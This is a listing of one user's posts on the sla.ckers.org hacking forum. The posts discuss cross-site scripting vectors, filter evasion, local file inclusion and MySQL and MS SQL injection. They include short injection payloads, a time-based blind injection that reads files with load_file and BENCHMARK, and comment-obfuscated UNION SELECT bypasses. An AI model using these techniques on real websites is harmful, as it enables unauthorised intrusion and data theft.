Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 40
1 year ago
choronzon
The app is not vulnerable to header injection :,-( Any other suggestions? Thanks.
Forum: XSS Info
1 year ago
choronzon
Hi folks, I found an XSS like this: HTTP/1.1 302 Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Location: http://localhost/<script>alert(123)</script> <a href='http://localhost/<script>alert(123)</script>'>http://localhost/<script>alert(123)</script></a> but, I can't obtain js execution.. is there any way to let the b
Forum: XSS Info
2 years ago
choronzon
Hello, I have and xss like this: POST /... Host: server ... par=<XSS> HTTP/1.1 200 OK ... Content-Type: text/plain; charset=UTF-8 ... {"par":"<XSS>"} client-side code execution can be obtained with IE, but I need a working vector for FF or Chrome. Any suggestions? Thanks, c.
Forum: XSS Info
3 years ago
choronzon
Thanks for your vector, but as I mentioned "(" and ")" are filtered!
Forum: XSS Info
3 years ago
choronzon
Hello, I'm working on some challenging XSS: filtered chars == ),(,>,< <script type="text/javascript" src="/pathINJTION_POINT.js"></script> injection example: <script type="text/javascript" src="/path" myField="aaa" crap="xyz.js"></script> Something similar here: <html xmlns="http://w
Forum: XSS Info
3 years ago
choronzon
Hello, I need to exploit these XSS injections. Please consider that i need to execute js code under firefox (>3.6.x) . The following are the injection points: 1) <link rel="crap" type="application/rss+xml" title="INJECTION" href="..."> We can inject a new attribute: <link rel="crap" type="application/rss+xml" title=
Forum: XSS Info
4 years ago
choronzon
Hi guys, here is my question. Let's assume we have to exploit this code : <? include "/some/path/" . $_GET["name"]; // ... ?> But also assume that we cant include any content-controlled file (such as apache's logs, because of permissions) nor include other daemon logs (ftp/sshd/etc) nor include /proc/XXX stuffs (i think ubuntu is a place where all thes
Forum: SQL and Code Injection
4 years ago
choronzon
it would be fantastic to make a script include a reflected input but it doesnt work :-( lfi.php?file=cgi-bin/xss.php?xss=<?php phpinfo(); ?> --> can you explain me under which condition was u able to make it work ? Thank you
Forum: SQL and Code Injection
5 years ago
choronzon
> Use ../../ to backtrack Ok, that works! Thank you.
Forum: SQL and Code Injection
5 years ago
choronzon
> I buy a nullbyte - in case magic_quotes is off. Eheh, that's ok to cut off ".php" string, BUT what about the "script" string ? Try again :-)
Forum: SQL and Code Injection
5 years ago
choronzon
Are there any ways to remotely exploit this local file inclusion ? (or better, a way to skip the first part of script name?) : include ("/some_path/script" . $_GET["lang"] . ".php"); Thank you.
Forum: SQL and Code Injection
5 years ago
choronzon
Regardless of the (db) content, if the site you mentioned is running ASP + MS SQL Server you should try to execute remote commands with this nice tool : http://sqlninja.sourceforge.net/
Forum: SQL and Code Injection
5 years ago
choronzon
> Did someone know any trick to bypass that ? Thanx > in advance :) Hi, I had a look at your anti-hack script and this is my solution. As you can see you can't read data with a canonical UNION SELECT injection because of the stripos() action. There is (i didn't found) no way to bypass this filter and use the SELECT. BUT if you have read permissions you can read data form the .MYD fi
Forum: SQL and Code Injection
6 years ago
choronzon
I have not a paper about this, but a friend of mine just wrote this post about INTO OUTFILE : http://www.webapptest.org/index.php?entry=entry070910-130659 bye
Forum: SQL and Code Injection
6 years ago
choronzon
In this (http://www.milw0rm.com/papers/149) interesting paper, author used a mysql error message ("Subquery returns more than 1 row") to play with (not so)blind injection. I would to know if are there any other mysql error message that can be triggered only AFTER the execution of the query (such as the subquery stuff). thanks --chrnzn
Forum: SQL and Code Injection
6 years ago
choronzon
Hi, are there any interesting way to use UDF (User-Defined Function) with SQL injection under php/mysql? I mean a real attack not only a hypothesis :-) thanks -choronzon
Forum: SQL and Code Injection
6 years ago
choronzon
Naaa..I know how read a script or read information_schema or bruteforce :-) i would find a way to find the table name maybe througth some messages displayed by mysql_error().
Forum: SQL and Code Injection
6 years ago
choronzon
Permission apart, INTO OUTFILE/DUMPFILE cant be used to overwrite file. It is a security feature by mysql :-P
Forum: SQL and Code Injection
6 years ago
choronzon
The problem is that only SELECT subquery are allowed..so there are no way to insert data in tables. chrnzn
Forum: SQL and Code Injection
6 years ago
choronzon
(Talking about MySQL + php) I was thinking about a way to find the name of the table selected by the injectable query without bruteforcing it. Are there any tricks ? (assume we have a visible injection). thank you choronzon
Forum: SQL and Code Injection
6 years ago
choronzon
> And yes, you can inject it. I don't see the problem here, I could inject whatever > I want for that matter. Naaa...this is impossible. But one moment : i'm talking about mysql + php. WHat r u talinking about ?
Forum: SQL and Code Injection
6 years ago
choronzon
Sure this is obvious, BUT we are talking about SQL INJECTION not mysql's console commands. There are NO way to inject that command, so it is useless in (my)SQL injection. that is just what i would to say. chrnzn
Forum: SQL and Code Injection
6 years ago
choronzon
I dont know which magical version of mysql r u using :) but on my mysql if i type : [---] Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1 Server version: 5.0.45-community-nt MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> mysql> select show variables; ERROR 1064 (42000): You have an erro
Forum: SQL and Code Injection
7 years ago
choronzon
> DESCRIBE <table> > SHOW VARIABLES I think these r impossible to use in a sql injection ;)
Forum: SQL and Code Injection
7 years ago
choronzon
> thanks choronzon, I am trying it, but db user > don't have FILE permission and the whole site > don't have any users/passwords(db) thing they just > have admin pages in a folder protected by > (apache)user/password. so it's useless without > accessing the file system :( Uhm..so no read permission .. and i think it is quite obvius that u dont have write permission (unio
Forum: SQL and Code Injection
7 years ago
choronzon
The answer is very simple : u can use the blind-tecniques to inference data from the db, exploiting the first query. You can read data byte-per-byte by using the benchmark() tecnique. Just append to the url somethign like : 666 and (if(mid(load_file(file_name_hex_encoded),X,1)=Y, BENCHMARK(..), 0)) if the X-th char of the file_name_hex_encoded is equals to Y u guess the char. If it happe
Forum: SQL and Code Injection
7 years ago
choronzon
Ah ok. As i said before i found somewhere an article from MS where it is mentionated that by default there is a sandbox on that doesnt permit u to execute that type of functions. I remember that the sendbox was abilited using a win register key. SO no way to bypass this thing. :-( bye chrnzn
Forum: SQL and Code Injection
7 years ago
choronzon
I can tell u that i read that some functio such as shell() can only be used if there r some special setting (a sort of sand box off, it is set on by default :( so u can just use some useless functuion such as time(), etc..) Can u give me more info about the use of shell() ? ah, at last i think the better way is to try to bruteforce table name in the db, and then crack pwd for admin access. by
Forum: SQL and Code Injection
7 years ago
choronzon
Hi Gustavo, i tried to play with that info but i think the most (or the whole :P) are useless. First of all i looked at this tables (i tested thme on a simple db with default options) : MSysACEs, MSysObjects, MSysQueries, MSysRelationships By using MSysObjects u could extract infos such as the ones that can be extracted from information_schema under other dbms, BUT by default access on it(a
Forum: SQL and Code Injection
7 years ago
choronzon
Try something like this : UnIOn/*ahhauhuwhwdwiud83ye83*/SeLecT/*ud37due3hd*/table_name etc.. maybe the filter is not case senstive --chrnzn
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2